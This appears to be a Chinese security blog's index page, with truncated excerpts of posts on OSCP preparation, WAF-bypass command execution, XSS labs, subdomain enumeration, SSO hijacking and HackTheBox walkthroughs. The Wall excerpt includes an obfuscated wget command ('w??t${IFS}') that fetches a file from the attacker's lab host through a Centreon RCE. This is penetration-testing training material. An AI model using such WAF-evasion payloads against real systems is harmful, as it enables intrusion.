学习清单:为oscp做准备 Offensive Security Certified Professional 参考资料: 官方考试要点 oscp faq 非常全的oscp备考资料 考试规则时间:23小时45分钟考试,结束后24小时内编写并提交渗透测试报告。 随机抽取5个主机,每个主机有低权限flag和代表以获取最高权限的flag,分数不一。拿到70分代表考试合格。 考试要准备的 护照 人民币5600——8050不等,根 2019-11-21 oscp
ptf框架 上一篇: AWS亚马逊云服务器搭建与使用 https://github.com/trustedsec/ptf https://vimeo.com/137133837 https://www.freebuf.com/sectool/209091.html 题外话君子性非异也,善假于物也 曾经有一句话一直困扰着我–“做渗透测试不要太依赖工具”。而渗透测试又不可能不用工具,我们使用各种各样的软件来 2019-11-21 tools tools
Wall-rce与绕过waf(下) 参考资料:绕过waf之命令执行 12题外话:恐惧和自满是练习的天敌。 ——————《刻意练习》 访问http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1 手动测试命令执行 (失败的)测试绕过waf/bin/w??t${IFS}http://10.10.14.18/index.htm 2019-11-18 training training
渗透实战第三版实验csk-web之XSS 参考资料:下载地址: http://thehackerplaybook.com/get.php?type=csk-web echo 目标机器的ip chat >> /etc/hosts 首先我们看下这个网站,注册一个账号并登陆。网页上有一些存在漏洞的提示。 反射型XSShttp://chat:3000/chatchannel/1 反射型XSS是最简单的xss,因为网页没有过滤用户 2019-11-16 web web
子域名搜集 上一篇说到了基于字典爆破的子域名搜集,这一篇讲一下基于搜索的子域名搜集。 由于有些网站的子域名非常独特,字典上是没有的。 Sublist3r12345678910111213141516171819git clone https://github.com/Plazmaz/Sublist3r.git /opt/Sublist3rcd /opt/Sublist3rpip install -r requ 2019-11-13 tools tools
绕过waf之命令执行 引子人生不是做菜,不能等所有材料准备好了再下锅。 参考资料命令执行的一些绕过技巧 Web Application Firewall (WAF) Evasion Techniques Web Application Firewall (WAF) Evasion Techniques #2 正文本文要讨论的是在linux系统中,当有rce(远程命令执行)漏洞时,绕过waf的操作有哪些。 基础知识提要w 2019-11-11 waf waf
Wall-rce与绕过waf(上) 参考资料: http://tylerrockwell.github.io/defeating-basic-auth-with-hydra/ apache Modsecurity waf绕过 https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/ 最近太忙了ORZ,这篇没做完… enumera 2019-11-09 training training
sso登陆劫持漏洞 引子最近项目遇到这个漏洞,但是我没有发现。。 正文参考资料: 腾讯单点登录系统跨域劫持漏洞 https://lvwei.me/passport.html#toc_8 sso单点登陆,用户一次登陆,所有系统都可访问。 sso设计目的是简化登陆方式,可能有很多系统,但是多个系统都是一个机构的,每个系统每次都要分别登陆就很复杂。 举个例子,OpenID是一个很流行的sso框架, 用户提交1. o 2019-10-30 web web
Europa(php rce) 引子一天可以当两天用,可是当十天不行。不要低估日积月累的作用。 scan1234567891011121314151617181922/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 6b:55:42:0a:f7:06:8c:67:c0:e 2019-10-27 training training
Sneaky(snmp默认口令泄露敏感信息) enum1234567Discovered open port 161/udp on 10.10.10.20 Discovered open port 80/tcp on 10.10.10.20 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))|_http-server-h 2019-10-26 training training